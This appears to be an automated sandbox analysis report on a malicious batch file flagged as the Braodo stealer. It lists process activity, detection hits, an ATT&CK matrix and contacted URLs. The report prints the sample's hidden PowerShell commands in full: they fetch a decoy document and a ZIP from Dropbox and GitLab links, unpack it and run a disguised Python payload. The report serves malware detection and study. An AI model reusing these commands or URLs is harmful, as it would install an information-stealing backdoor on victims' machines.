              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3428Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4896Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6292Thread sleep count: 2023 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7068Thread sleep count: 962 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6268Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: powershell.exe, 0000000E.00000002.2326723218.00000254F1785000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWI
              Source: powershell.exe, 0000000C.00000002.2211796512.000001F3F1734000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_5896.amsi.csv, type: OTHER
              Source: Yara matchFile source: amsi64_1584.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5896, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1584, type: MEMORYSTR
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp.com 437Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fiNdstr /L /I set "C:\Users\user\Desktop\hnl2bose13.bat"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fiNdstr /L /I goto "C:\Users\user\Desktop\hnl2bose13.bat"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fiNdstr /L /I echo "C:\Users\user\Desktop\hnl2bose13.bat"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fiNdstr /L /I pause "C:\Users\user\Desktop\hnl2bose13.bat"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe fINdJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx'"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bosse21/mkt/-/raw/main/12Fukrun.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\rz_317.pd clickapp"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_advertising_campaign_and_collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'c:\users\user\appdata\local\temp\\12_advertising_campaign_and_collaboration.docx')"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://gitlab.com/bosse21/mkt/-/raw/main/12fukrun.zip', 'c:\users\public\document.zip')"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_advertising_campaign_and_collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'c:\users\user\appdata\local\temp\\12_advertising_campaign_and_collaboration.docx')"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://gitlab.com/bosse21/mkt/-/raw/main/12fukrun.zip', 'c:\users\public\document.zip')"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Braodo
              Source: Yara matchFile source: amsi64_5048.amsi.csv, type: OTHER

              Remote Access Functionality

              barindex
              Yara detected Braodo
              Source: Yara matchFile source: amsi64_5048.amsi.csv, type: OTHER

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information11
              Scripting              		Valid Accounts1
              Command and Scripting Interpreter              		11
              Scripting              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping11
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		21
              Virtualization/Sandbox Evasion              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media3
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Process Injection              		Security Account Manager21
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Obfuscated Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture4
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading              		LSA Secrets1
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              hnl2bose13.bat3%ReversingLabs

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://a.sprig.com/0%Avira URL Cloudsafe
              http://ucf06ed174ff1aa451643813ce27.dl.dropboxusercontent.com0%Avira URL Cloudsafe
              https://ucf06ed174ff1aa451643813ce27.dl.dropboxusercontent.com/cd/0/get/CelT5aTdmoNoeQaou8KCBWvfzViG0%Avira URL Cloudsafe
              https://gitlab.com(0%Avira URL Cloudsafe
              https://instructorledlearning.dropboxbusiness.com/100%Avira URL Cloudphishing
              https://www.hellofax.com/0%Avira URL Cloudsafe
              https://sales.dropboxbusiness.com/0%Avira URL Cloudsafe
              https://ucf06ed174ff1aa451643813ce27.dl.dropboxusercontent.com0%Avira URL Cloudsafe
              https://officeapps-df.live.com0%Avira URL Cloudsafe
              https://navi.dropbox.jp/0%Avira URL Cloudsafe
              https://docs.sandbox.google.com/document/fsip/0%Avira URL Cloudsafe
              https://docs.sandbox.google.com/spreadsheets/fsip/0%Avira URL Cloudsafe
              https://selfguidedlearning.dropboxbusiness.com/0%Avira URL Cloudsafe
              https://docs.sandbox.google.com/presentation/fsip/0%Avira URL Cloudsafe
              https://app.hellofax.com/0%Avira URL Cloudsafe
              https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              edge-block-www-env.dropbox-dns.com
              		162.125.66.15
              		truefalse
                		high
                gitlab.com
                		172.65.251.78
                		truefalse
                  		high
                  www-env.dropbox-dns.com
                  		162.125.66.18
                  		truefalse
                    		high
                    ucf06ed174ff1aa451643813ce27.dl.dropboxusercontent.com
                    		unknown
                    		unknownfalse
                      		unknown
                      www.dropbox.com
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://gitlab.com/users/sign_infalse
                          		high
                          https://gitlab.com/bosse21/mkt/-/raw/main/12Fukrun.zipfalse
                            		high
                            https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1false
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://gitlab.compowershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://www.dropbox.com/service_worker.jspowershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://gitlab.com/-/sandbox/;powershell.exe, 0000000E.00000002.2259371706.00000254DAB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://paper.dropbox.com/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.hellofax.com/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://pal-test.adyen.compowershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.dropbox.compowershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://paper.dropbox.com/cloud-docs/editpowershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://contoso.com/Licensepowershell.exe, 00000010.00000002.2457157959.0000024414264000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://snowplow.trx.gitlab.netpowershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://app.hellosign.com/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://collector.prd-278964.gl-product-analytics.compowershell.exe, 0000000E.00000002.2259371706.00000254DAB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.hellosign.com/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://instructorledlearning.dropboxbusiness.com/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: phishing
                                                      		unknown
                                                      https://www.dropbox.com/page_success/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://gitlab.compowershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.dropbox.com/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.dropbox.com/pithos/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://ucf06ed174ff1aa451643813ce27.dl.dropboxusercontent.compowershell.exe, 0000000C.00000002.2186557399.000001F381671000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://sales.dropboxbusiness.com/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://photos.dropbox.com/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
